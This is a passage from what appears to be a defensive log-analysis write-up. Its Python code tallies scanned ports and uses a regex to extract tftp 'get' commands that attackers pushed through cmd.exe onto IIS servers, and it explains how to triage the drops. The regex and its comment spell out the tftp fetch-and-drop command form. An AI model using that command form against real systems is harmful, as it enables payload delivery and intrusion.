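        return None  # unbalanced name field: not a well-formed record
    name = line[m.end():i - 1].strip()
    port = int(m.group(3)) if m.group(3) else None
    return Record(m.group(1), m.group(2), port, name, line[i:].strip())


# Decoded form of the cmd.exe tftp abuse: tftp[.exe][junk] ["]-i["] HOST get FILE DEST
_TFTP = re.compile(
    r'tftp(?:\.exe)?\S*?\s*"?-i"?\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)\s+(\S+)',
    re.IGNORECASE,
)


def tftp_drop(notes: str):
    """Return (tftp_host, remote_file, local_path) if the notes carry a tftp GET, else None.

    The logged commands are URL-encoded as they appeared in the request line
    ('%20', '+', '%22'), so decode before matching."""
    m = _TFTP.search(unquote_plus(notes))
    return m.groups() if m else None


_PORTS = re.compile(r"\bports?\s+([0-9][0-9,\s]*)", re.IGNORECASE)


def scanned_ports(notes: str):
    """Ports listed after 'port'/'ports' in a scan note; non-numeric tokens such
    as 'ping' are dropped: 'ports 137,138,445, ping' -> [137, 138, 445]."""
    m = _PORTS.search(notes)
    if not m:
        return []
    return [int(p) for p in re.split(r"[,\s]+", m.group(1).strip()) if p.isdigit()]


def summarize(text: str) -> dict:
    """Tally scanned ports and collect every tftp drop across a whole summary."""
    ports, drops, unparsed = Counter(), [], 0
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            unparsed += 1
            continue
        ports.update(scanned_ports(rec.notes))
        drop = tftp_drop(rec.notes)
        if drop:
            drops.append((rec.src_ip, *drop))
    return {"ports": ports, "drops": drops, "unparsed": unparsed}


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("most scanned ports:", s["ports"].most_common(3))
    for src, host, fname, dest in s["drops"]:
        print(f"{src} pulled {fname} from {host} into {dest}")
```

Two details matter for triage. The tftp host is often not the attacking IP at all (several entries above fetch cool.dll from other 132.x.x.x hosts), so the drops list is a ready-made list of already-compromised machines to notify. And the decoded destination path tells you whether the drop landed somewhere IIS will execute it (scripts/, an ISAPI .dll name) or just on disk.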